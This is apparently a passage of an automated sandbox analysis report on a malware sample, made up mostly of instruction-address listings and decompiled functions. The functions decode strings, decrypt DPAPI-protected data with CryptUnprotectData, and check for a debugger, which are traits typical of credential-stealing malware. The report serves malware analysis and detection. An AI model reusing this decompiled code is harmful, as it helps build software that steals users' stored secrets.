                                                                    0x0041c7e9
                                                                    0x0041c7ec
                                                                    0x0041c7fe
                                                                    0x0041c801
                                                                    0x0041c813
                                                                    0x0041c816
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c81c
                                                                    0x0041c821
                                                                    0x0041c821
                                                                    0x0041c823
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c829
                                                                    0x0041c829
                                                                    0x0041c829
                                                                    0x0041c82f
                                                                    0x0041c835
                                                                    0x0041c835
                                                                    0x0041c83c
                                                                    0x0041c843
                                                                    0x0041c844
                                                                    0x0041c844
                                                                    0x0041c848
                                                                    0x0041c84e
                                                                    0x0041c851
                                                                    0x0041c851
                                                                    0x0041c853
                                                                    0x0041c854
                                                                    0x0041c854
                                                                    0x0041c85a
                                                                    0x0041c860
                                                                    0x0041c866
                                                                    0x0041c884
                                                                    0x0041c886
                                                                    0x0041c894
                                                                    0x0041c89b
                                                                    0x0041c89c
                                                                    0x0041c8aa
                                                                    0x0041c8b0
                                                                    0x0041c8b3
                                                                    0x0041c8ba
                                                                    0x0041c8c0
                                                                    0x0041c8c6
                                                                    0x0041c8d0
                                                                    0x0041c8d6
                                                                    0x0041c8dc
                                                                    0x0041c8e3
                                                                    0x0041c8e4
                                                                    0x0041c8e6
                                                                    0x0041c8e8
                                                                    0x0041c8ee
                                                                    0x0041c8f2
                                                                    0x0041c8f2
                                                                    0x0041c8ee
                                                                    0x0041c900
                                                                    0x0041c907
                                                                    0x0041c90d
                                                                    0x0041c914
                                                                    0x0041c916
                                                                    0x0041c92d
                                                                    0x0041c92d
                                                                    0x00000000
                                                                    0x0041c918
                                                                    0x0041c918
                                                                    0x0041c91b
                                                                    0x0041c91d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c925
                                                                    0x0041c933
                                                                    0x0041c936
                                                                    0x0041c93e
                                                                    0x0041c941
                                                                    0x0041c94b
                                                                    0x0041c957
                                                                    0x0041c95d
                                                                    0x0041c966
                                                                    0x0041c96f
                                                                    0x0041c978
                                                                    0x0041c97b
                                                                    0x0041c986
                                                                    0x0041c994
                                                                    0x0041c999
                                                                    0x0041c9a0
                                                                    0x0041c9ac
                                                                    0x0041c9af
                                                                    0x0041c9ba
                                                                    0x0041c9c8
                                                                    0x0041c9cd
                                                                    0x0041c9d4
                                                                    0x0041c9dd
                                                                    0x0041c9e0
                                                                    0x0041c9ee
                                                                    0x0041c9f6
                                                                    0x0041c9fc
                                                                    0x0041ca05
                                                                    0x0041ca0c
                                                                    0x0041ca10
                                                                    0x0041ca19
                                                                    0x0041ca1a
                                                                    0x0041ca1b
                                                                    0x0041ca1c
                                                                    0x0041ca24
                                                                    0x0041ca2e
                                                                    0x0041ca34
                                                                    0x0041ca38
                                                                    0x0041ca3d
                                                                    0x0041ca3f
                                                                    0x0041ca62
                                                                    0x0041ca65
                                                                    0x0041ca69
                                                                    0x0041ca7a
                                                                    0x0041ca7c
                                                                    0x0041ca7f
                                                                    0x0041ca85
                                                                    0x0041ca8c
                                                                    0x0041ca93
                                                                    0x0041ca95
                                                                    0x0041caa5
                                                                    0x0041caa5
                                                                    0x0041caac
                                                                    0x0041caae
                                                                    0x0041cabc
                                                                    0x0041cabf
                                                                    0x0041cac4
                                                                    0x0041cac5
                                                                    0x0041cac5
                                                                    0x0041cac7
                                                                    0x0041cacf
                                                                    0x0041cad3
                                                                    0x0041cad4
                                                                    0x0041cad4
                                                                    0x0041cae2
                                                                    0x0041cae5
                                                                    0x0041cae5
                                                                    0x0041cae7
                                                                    0x0041cae7
                                                                    0x0041caf2
                                                                    0x0041caf7
                                                                    0x0041caf8
                                                                    0x0041caf9
                                                                    0x0041cafb
                                                                    0x0041cafb
                                                                    0x0041cb02
                                                                    0x0041cb04
                                                                    0x0041cb06
                                                                    0x0041cb0d
                                                                    0x0041cb15
                                                                    0x0041cb17
                                                                    0x0041cb1c
                                                                    0x0041cb1c
                                                                    0x0041cb1c
                                                                    0x0041cb1c
                                                                    0x0041cb0d
                                                                    0x0041cb20
                                                                    0x0041cb26
                                                                    0x0041cb28
                                                                    0x0041cb38
                                                                    0x0041cb38
                                                                    0x0041cb38
                                                                    0x00000000
                                                                    0x0041cb2a
                                                                    0x0041cb2a
                                                                    0x0041cb31
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cb35
                                                                    0x0041cb3a
                                                                    0x0041cb3a
                                                                    0x0041cb41
                                                                    0x0041cb47
                                                                    0x0041cb4a
                                                                    0x0041cb74
                                                                    0x0041cb7a
                                                                    0x0041cb7a
                                                                    0x0041cb7c
                                                                    0x0041cb80
                                                                    0x0041cb85
                                                                    0x0041cb8b
                                                                    0x0041cb8e
                                                                    0x0041cb91
                                                                    0x0041cb93
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cb99
                                                                    0x0041cb9f
                                                                    0x0041ca48
                                                                    0x0041ca48
                                                                    0x00000000
                                                                    0x0041ca48
                                                                    0x0041cbab
                                                                    0x0041cbae
                                                                    0x0041cbb0
                                                                    0x0041cbb6
                                                                    0x0041cbbf
                                                                    0x0041cbc2
                                                                    0x0041cbc6
                                                                    0x0041cbcc
                                                                    0x0041cbd2
                                                                    0x0041cc4f
                                                                    0x0041cc4f
                                                                    0x0041cc56
                                                                    0x0041cc62
                                                                    0x0041cc64
                                                                    0x0041cc6a
                                                                    0x0041cc6a
                                                                    0x0041cc6c
                                                                    0x0041cc72
                                                                    0x0041cc77
                                                                    0x0041cc79
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cc86
                                                                    0x0041cc86
                                                                    0x0041cc86
                                                                    0x0041cc8a
                                                                    0x0041cc91
                                                                    0x0041cc91
                                                                    0x0041cc94
                                                                    0x0041cc96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041ccaa
                                                                    0x0041ccb3
                                                                    0x0041ccc0
                                                                    0x0041ccc6
                                                                    0x0041ccd1
                                                                    0x0041ccd9
                                                                    0x0041ccd9
                                                                    0x0041ccdb
                                                                    0x0041ccde
                                                                    0x0041cce0
                                                                    0x0041cce9
                                                                    0x0041cce9
                                                                    0x0041cce9
                                                                    0x0041ccef
                                                                    0x0041ccf2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cce7
                                                                    0x0041cce7
                                                                    0x0041ccf4
                                                                    0x0041ccfa
                                                                    0x0041ccfa
                                                                    0x00000000
                                                                    0x0041ccfa
                                                                    0x0041cce2
                                                                    0x00000000
                                                                    0x0041cce2
                                                                    0x0041cc66
                                                                    0x0041cc68
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cc68
                                                                    0x0041cc58
                                                                    0x0041cc58
                                                                    0x00000000
                                                                    0x0041cc58
                                                                    0x0041cbd4
                                                                    0x0041cbd7
                                                                    0x0041cbe2
                                                                    0x0041cbe2
                                                                    0x0041cbe9
                                                                    0x0041cbf0
                                                                    0x0041cbf7
                                                                    0x0041cbf7
                                                                    0x0041cbf7
                                                                    0x0041cbf7
                                                                    0x0041cc0b
                                                                    0x0041cc0e
                                                                    0x0041cc17
                                                                    0x0041cc1c
                                                                    0x0041cc1e
                                                                    0x0041cc2a
                                                                    0x0041cc2c
                                                                    0x0041cc32
                                                                    0x0041cc37
                                                                    0x0041cc39
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cc3f
                                                                    0x0041cc44
                                                                    0x0041cc49
                                                                    0x0041cc4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cc20
                                                                    0x0041cc20
                                                                    0x0041cc20
                                                                    0x00000000
                                                                    0x0041cc20
                                                                    0x0041cc1e
                                                                    0x0041cbd9
                                                                    0x0041cbe0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cbe0
                                                                    0x0041cb4c
                                                                    0x0041cb4f
                                                                    0x0041cb61
                                                                    0x0041cb63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041cb67
                                                                    0x0041cb6c
                                                                    0x0041cb6c
                                                                    0x00000000
                                                                    0x0041cb6c
                                                                    0x0041cb5a
                                                                    0x00000000
                                                                    0x0041cb5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041ca97
                                                                    0x0041ca97
                                                                    0x0041ca97
                                                                    0x0041ca99
                                                                    0x0041ca9b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041ca9d
                                                                    0x0041caa2
                                                                    0x0041caa2
                                                                    0x0041caa3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041caa3
                                                                    0x00000000
                                                                    0x0041ca97
                                                                    0x0041ca6b
                                                                    0x0041ca6d
                                                                    0x0041ca72
                                                                    0x00000000
                                                                    0x0041ca72
                                                                    0x0041ca41
                                                                    0x0041ca43
                                                                    0x00000000
                                                                    0x0041ca43
                                                                    0x0041c916
                                                                    0x0041c86e
                                                                    0x0041c86e
                                                                    0x0041c86f
                                                                    0x0041c86f
                                                                    0x0041c872
                                                                    0x0041c873
                                                                    0x0041c873
                                                                    0x0041c87c
                                                                    0x0041c87e
                                                                    0x0041c87e
                                                                    0x0041c87e
                                                                    0x00000000
                                                                    0x0041c87e
                                                                    0x0041c806
                                                                    0x0041c80c
                                                                    0x00000000
                                                                    0x0041c80c
                                                                    0x0041c7f7
                                                                    0x00000000
                                                                    0x0041c7f7
                                                                    0x0041c7e0
                                                                    0x0041c7e2
                                                                    0x00000000
                                                                    0x0041c7e2
                                                                    0x0041c7bd
                                                                    0x0041c7c3
                                                                    0x0041c7c8
                                                                    0x0041c7ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c7ca
                                                                    0x0041c780
                                                                    0x0041c786
                                                                    0x0041c789
                                                                    0x0041c789
                                                                    0x0041c78b
                                                                    0x0041c78c
                                                                    0x0041c78c
                                                                    0x0041c790
                                                                    0x0041c792
                                                                    0x0041c79a
                                                                    0x0041c7a1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041c716
                                                                    0x0041c716
                                                                    0x00000000
                                                                    0x0041c716
                                                                    0x0041c706
                                                                    0x0041c706
                                                                    0x0041cd03
                                                                    0x0041cd11
                                                                    0x0041cd11

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /$UT
                                                                    • API String ID: 0-1626504983
                                                                    • Opcode ID: 1580c0a324d329e5f01ca90be48cd768f3d3da79c5a9ab48edff02e46c69d75c
                                                                    • Instruction ID: a887f3ce2049bf9975ac98b2df1c0d5ee50926fc17ebe0ce4a4d346fba0e3955
                                                                    • Opcode Fuzzy Hash: 1580c0a324d329e5f01ca90be48cd768f3d3da79c5a9ab48edff02e46c69d75c
                                                                    • Instruction Fuzzy Hash: 84027D709442698BDF21CF28DC803EEBBB1AF55304F1444EAD949AB242D7789EC5CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E3F0 Relevance: 9.1, APIs: 6, Instructions: 93stringencryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040E42C
                                                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E441
                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040E449
                                                                    • _memmove.LIBCMT ref: 0040E4A3
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4B9
                                                                    • lstrcatA.KERNEL32(0043C8D8,0043C8D8,?,00000000,?,00000001,?,?,00000000,00000000,00000000,?,0040FA4D,?,?,0043C8D8), ref: 0040E4CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                    • String ID:
                                                                    • API String ID: 943939369-0
                                                                    • Opcode ID: a8cad6c8e4c14ceda9a507e367f9aa5b572d9d70c5cba7095773e717734efe9c
                                                                    • Instruction ID: d1e8293adbde57431bfdfa0b3896d8325c53172deab819d65320c261a2c2aaf8
                                                                    • Opcode Fuzzy Hash: a8cad6c8e4c14ceda9a507e367f9aa5b572d9d70c5cba7095773e717734efe9c
                                                                    • Instruction Fuzzy Hash: 3931FC75900219AFDB109FA59C889EEBBBCFF0A354F15043AF909E7241EB3499048B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415890 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 32%
                                                                    			E00415890(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t43;
				signed int* _t44;
				void* _t46;

				_t46 = __eflags;
				_t38 = __edx;
				_t36 = __ecx;
				E0042083E(E00434621, __ebx, __edi, __esi);
				 *(_t43 - 0x108) =  *(_t43 - 0x108) & 0x00000000;
				 *(_t43 - 0x24) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				GetSystemTime(_t43 - 0x24);
				GetTimeZoneInformation(_t43 - 0x104);
				 *((short*)(_t43 - 0x34)) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				 *0x4464d8(_t43 - 0x104, _t43 - 0x24, _t43 - 0x34, 0xfc);
				_push(_t36);
				asm("fild dword [ebp-0x104]");
				asm("fchs");
				 *(_t43 - 0x108) = __fp0 /  *0x43f728;
				 *_t44 =  *(_t43 - 0x108);
				_push(_t43 - 0x50);
				_t30 = E0041615D(__ebx, _t38, _t43 - 0x32, __esi, _t46);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				E00404697(_t36, __esi, "UTC", _t30);
				E00404354(_t43 - 0x50, 1, 0);
				return E00420888(__ebx, _t43 - 0x32, __esi);
			}









                                                                    0x00415890
                                                                    0x00415890
                                                                    0x00415890
                                                                    0x0041589a
                                                                    0x0041589f
                                                                    0x004158a8
                                                                    0x004158af
                                                                    0x004158b0
                                                                    0x004158b1
                                                                    0x004158b2
                                                                    0x004158b8
                                                                    0x004158c5
                                                                    0x004158cd
                                                                    0x004158d4
                                                                    0x004158d5
                                                                    0x004158d6
                                                                    0x004158d7
                                                                    0x004158e8
                                                                    0x004158ee
                                                                    0x004158ef
                                                                    0x004158fe
                                                                    0x00415900
                                                                    0x0041590c
                                                                    0x0041590f
                                                                    0x00415910
                                                                    0x00415915
                                                                    0x00415920
                                                                    0x0041592f
                                                                    0x0041593b

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0041589A
                                                                    • GetSystemTime.KERNEL32(?), ref: 004158B8
                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004158C5
                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004158E8
                                                                      • Part of subcall function 0041615D: __EH_prolog3.LIBCMT ref: 00416167
                                                                      • Part of subcall function 0041615D: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416208
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$System$H_prolog3H_prolog3_InformationIos_base_dtorLocalSpecificZone_memmovestd::ios_base::_
                                                                    • String ID: UTC
                                                                    • API String ID: 2104780860-2754919731
                                                                    • Opcode ID: 8744bb6a9babb2631268157343bc8588b84851c1a6e1c846dec4e50bd8b1d93f
                                                                    • Instruction ID: 43c0975b4facea423fcd3bb8f92bd3f32dbffd23a130000cfe697fc8daaff8d2
                                                                    • Opcode Fuzzy Hash: 8744bb6a9babb2631268157343bc8588b84851c1a6e1c846dec4e50bd8b1d93f
                                                                    • Instruction Fuzzy Hash: F7117C71D00118FFDB40EBE4DD45BCEB7B8AF59305F1004A6E244F2051DBB89E988B5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042A969 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0042A969(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E004252B0(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E004252B0(__esi, ?str?) != 0) {
						_v8 = E0041EA0D(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}





                                                                    0x0042a969
                                                                    0x0042a971
                                                                    0x0042a9d9
                                                                    0x0042a9e3
                                                                    0x00000000
                                                                    0x0042a9e5
                                                                    0x0042a9ec
                                                                    0x0042a9ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042a989
                                                                    0x0042a998
                                                                    0x0042a9be
                                                                    0x00000000
                                                                    0x0042a99a
                                                                    0x0042a9b0
                                                                    0x0042a9db
                                                                    0x0042a9de
                                                                    0x0042a9b2
                                                                    0x0042a9b2
                                                                    0x0042a9b6
                                                                    0x0042a9b6
                                                                    0x0042a9b0
                                                                    0x0042a998

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000,00000000), ref: 0042A9A8
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000,00000000), ref: 0042A9D1
                                                                    • GetACP.KERNEL32(?,?,0042AFA6,?,00420E8A,?,000000BC,?,00000001,00000000), ref: 0042A9E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: a8ffcdeed41c69b855cf39dbf5a919eb22e713f5debcebad4af82cf12c594d71
                                                                    • Instruction ID: febc8eaa90a09055e3a7e711ae5ad2748a80d9b1ff6c8135008803a5b45ae77b
                                                                    • Opcode Fuzzy Hash: a8ffcdeed41c69b855cf39dbf5a919eb22e713f5debcebad4af82cf12c594d71
                                                                    • Instruction Fuzzy Hash: 8601B9B1705A16BBDB119762BC06F5F72A9AF05318F600857E901D01C0DB68DFD1965E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041DA9B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E0041DA9B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x443674; // 0x393162b1
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x444e08 = _t6;
				 *0x444e04 = _t22;
				 *0x444e00 = _t25;
				 *0x444dfc = _t21;
				 *0x444df8 = _t27;
				 *0x444df4 = _t26;
				 *0x444e20 = ss;
				 *0x444e14 = cs;
				 *0x444df0 = ds;
				 *0x444dec = es;
				 *0x444de8 = fs;
				 *0x444de4 = gs;
				asm("pushfd");
				_pop( *0x444e18);
				 *0x444e0c =  *_t31;
				 *0x444e10 = _v0;
				 *0x444e1c =  &_a4;
				 *0x444d58 = 0x10001;
				_t11 =  *0x444e10; // 0x0
				 *0x444d0c = _t11;
				 *0x444d00 = 0xc0000409;
				 *0x444d04 = 1;
				_t12 =  *0x443674; // 0x393162b1
				_v812 = _t12;
				_t13 =  *0x443678; // 0xc6ce9d4e
				_v808 = _t13;
				 *0x444d50 = IsDebuggerPresent();
				_push(1);
				E0042D3F5(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x435d70);
				if( *0x444d50 == 0) {
					_push(1);
					E0042D3F5(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041da9b
                                                                    0x0041daa1
                                                                    0x0041daa3
                                                                    0x0041daa3
                                                                    0x00422fc1
                                                                    0x00422fc6
                                                                    0x00422fcc
                                                                    0x00422fd2
                                                                    0x00422fd8
                                                                    0x00422fde
                                                                    0x00422fe4
                                                                    0x00422feb
                                                                    0x00422ff2
                                                                    0x00422ff9
                                                                    0x00423000
                                                                    0x00423007
                                                                    0x0042300e
                                                                    0x0042300f
                                                                    0x00423018
                                                                    0x00423020
                                                                    0x00423028
                                                                    0x00423033
                                                                    0x0042303d
                                                                    0x00423042
                                                                    0x00423047
                                                                    0x00423051
                                                                    0x0042305b
                                                                    0x00423060
                                                                    0x00423066
                                                                    0x0042306b
                                                                    0x00423077
                                                                    0x0042307c
                                                                    0x0042307e
                                                                    0x00423086
                                                                    0x00423091
                                                                    0x0042309e
                                                                    0x004230a0
                                                                    0x004230a2
                                                                    0x004230a7
                                                                    0x004230bb

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00423071
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423086
                                                                    • UnhandledExceptionFilter.KERNEL32(00435D70), ref: 00423091
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004230AD
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004230B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 2579439406-0
                                                                    • Opcode ID: 5c628fe7a839dc3cde5843dce2d8718577464646037a970df2fc8381dab1a578
                                                                    • Instruction ID: 214c0d62a537c9700224adae85c1850bcd2d42f3721d8878eabfc0ec3ff5be95
                                                                    • Opcode Fuzzy Hash: 5c628fe7a839dc3cde5843dce2d8718577464646037a970df2fc8381dab1a578
                                                                    • Instruction Fuzzy Hash: CC212DBC900600EFD314DF68FD49B443BB0BB8A306F61403AE91887360E7B54A818F9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E80D Relevance: 7.6, APIs: 5, Instructions: 50encryptionCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 31%
                                                                    			E0040E80D(char __eax, intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t23;
				void* _t24;

				_t23 = __eax;
				_t21 = __ecx;
				E00420090(E0041DAE4(_t20, __ecx, __eax, __eax), _t21, _t23);
				_v8 = _t21;
				_v12 = _t23;
				_t24 = E0041DAE4(_t20, _t21, _t23, _t23);
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				if( *0x446330() == 0) {
					return 0;
				}
				_t22 = _v20;
				if(_t22 > 0) {
					E00420090(_t24, _v16, _t22);
				}
				 *((char*)(_t22 + _t24)) = 0;
				return _t24;
			}














                                                                    0x0040e816
                                                                    0x0040e819
                                                                    0x0040e823
                                                                    0x0040e829
                                                                    0x0040e82c
                                                                    0x0040e837
                                                                    0x0040e83e
                                                                    0x0040e83f
                                                                    0x0040e840
                                                                    0x0040e841
                                                                    0x0040e842
                                                                    0x0040e843
                                                                    0x0040e847
                                                                    0x0040e850
                                                                    0x00000000
                                                                    0x0040e86d
                                                                    0x0040e852
                                                                    0x0040e857
                                                                    0x0040e85e
                                                                    0x0040e863
                                                                    0x0040e866
                                                                    0x00000000

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 0040E81B
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • _memmove.LIBCMT ref: 0040E823
                                                                    • _malloc.LIBCMT ref: 0040E82F
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E848
                                                                    • _memmove.LIBCMT ref: 0040E85E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
                                                                    • String ID:
                                                                    • API String ID: 2315474888-0
                                                                    • Opcode ID: b8b378b900a93f00d87ce76ceb73221065714ee5fe5af70d6800e80a949424ac
                                                                    • Instruction ID: 0b2d1560495a64abfde54cc84344305bbe744bb266e7e4d9481ecb72b86ac225
                                                                    • Opcode Fuzzy Hash: b8b378b900a93f00d87ce76ceb73221065714ee5fe5af70d6800e80a949424ac
                                                                    • Instruction Fuzzy Hash: 77F0C273E00128BBCB10BBFB5C45DEFBBAC9D81654B04087BF500E3242E674DA1082B9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E5CE Relevance: 6.0, APIs: 4, Instructions: 44memoryencryptionCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E0040E5CE(intOrPtr __eax, long* __edi, char _a4, void** _a8) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				long _t19;
				void* _t20;
				void* _t22;

				_v16 = __eax;
				_v20 = _a4;
				_t22 =  *0x446330( &_v20, 0, 0, 0, 0, 0,  &_v12);
				if(_t22 != 0) {
					_t19 = _v12;
					 *__edi = _t19;
					_t20 = LocalAlloc(0x40, _t19);
					 *_a8 = _t20;
					if(_t20 != 0) {
						E00420090(_t20, _v8,  *__edi);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _t22 != 0x00000000;
			}










                                                                    0x0040e5d6
                                                                    0x0040e5dc
                                                                    0x0040e5f4
                                                                    0x0040e5f8
                                                                    0x0040e5fa
                                                                    0x0040e600
                                                                    0x0040e602
                                                                    0x0040e60b
                                                                    0x0040e60f
                                                                    0x0040e617
                                                                    0x0040e61c
                                                                    0x0040e60f
                                                                    0x0040e630

                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E5EE
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040E602
                                                                    • _memmove.LIBCMT ref: 0040E617
                                                                    • LocalFree.KERNEL32(?), ref: 0040E622
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Local$AllocCryptDataFreeUnprotect_memmove
                                                                    • String ID:
                                                                    • API String ID: 3008826695-0
                                                                    • Opcode ID: f3cb171338736501db8c078a02f8cf8285bb8ecbce5ec10c647ce522f11ac20e
                                                                    • Instruction ID: 7eff8b3fd86d6f16b25c6b63ab63048266329acdc648202af58fd0e1868d6503
